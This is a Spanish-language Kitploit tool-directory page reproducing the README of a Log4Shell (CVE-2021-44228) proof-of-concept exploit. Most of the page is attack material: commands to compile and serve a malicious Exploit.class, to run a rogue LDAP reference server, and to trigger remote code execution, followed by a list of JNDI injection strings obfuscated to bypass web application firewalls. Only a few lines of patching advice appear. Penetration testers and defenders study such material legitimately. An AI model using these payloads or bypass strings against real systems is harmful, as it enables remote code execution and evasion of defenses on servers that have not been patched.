Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44228-Apache-Log4j-Rce-main — Exploit de prueba de concepto para CVE-2021-44228 (Log4Shell) con inyección JNDI LDAP/RMI, compilación de payload y técnicas de evasión de WAF para probar vulnerabilidades de RCE en Log4j. | Kitploit
Herramientas/GitHubGitHub/ravid-checkmarx/cve-2021-44228-apache-log4j-rce-main
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebEvasión de WAFPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubravid-checkmarx/cve-2021-44228-apache-log4j-rce-main

CVE-2021-44228-Apache-Log4j-Rce-main

Exploit de prueba de concepto para CVE-2021-44228 (Log4Shell) con inyección JNDI LDAP/RMI, compilación de payload y técnicas de evasión de WAF para probar vulnerabilidades de RCE en Log4j.

Ver Repositorio
4hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-44228 (Ejecución Remota de Código en Apache Log4j)

todas las versiones de log4j-core >=2.0-beta9 y <=2.14.1

Las versiones 1.x tienen otras vulnerabilidades, recomendamos que actualices a la última versión.

Avisos de seguridad / Boletines relacionados con Log4Shell (CVE-2021-44228)

Uso:

descarga este proyecto, compila el código de exploit blob/master/src/main/java/Exploit.java, e inicia un servidor web que permita descargar el binario compilado.

root@kitploit:~
git clone https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce.git
cd CVE-2021-44228-Apache-Log4j-Rce

javac Exploit.java

# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888

# make sure python webserver is running the same directory as Exploit.class, to test
  curl -I 127.0.0.1:8888/Exploit.class

descarga otro proyecto y ejecuta implementación de servidor LDAP que devuelve referencias JNDI* https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/jndi/LDAPRefServer.java

root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

compila y ejecuta el código de activación (simula un ataque log4j en un servidor web Java vulnerable) blob/master/src/main/java/log4j.java, y aparecerá tu aplicación de calculadora.

root@kitploit:~
cd CVE-2021-44228-Apache-Log4j-Rce
mvn clean package
java -cp target/log4j-rce-1.0-SNAPSHOT-all.jar log4j

# expect the following
# 1. calculator app appear
# 2. in ldapserver console,
#  Send LDAP reference result for Exploit redirecting to http://127.0.0.1:8888/Exploit.class
# 3. in webserver console,
#  127.0.0.1 - - [....] "GET /Exploit.class HTTP/1.1" 200 -

Consejos:

No confíes en que una versión actual de Java te salve. Actualiza Log4 (o elimina la búsqueda JNDI). Desactiva la expansión (de todas formas parece una mala idea).

Bypass de rc1

Por ejemplo:

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/ badClassName}

Bypass WAF

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

No confíes en el firewall de aplicaciones web.

Detalles de la Vulnerabilidad

Las búsquedas (Lookups) proporcionan una forma de agregar valores a la configuración de Log4j en lugares arbitrarios.

Lookups

Los métodos para causar fuga en finally

root@kitploit:~
LogManager.getLogger().error()
LogManager.getLogger().fatal()

Método de Verificación Simple

Si deseas realizar pruebas de caja negra, te sugiero que hagas escaneo pasivo.

BurpLog4jScan

¡Diviértete!!! BurpLog4jScan.png

Estrellas a lo largo del tiempo

Stargazers over time

Descargar herramienta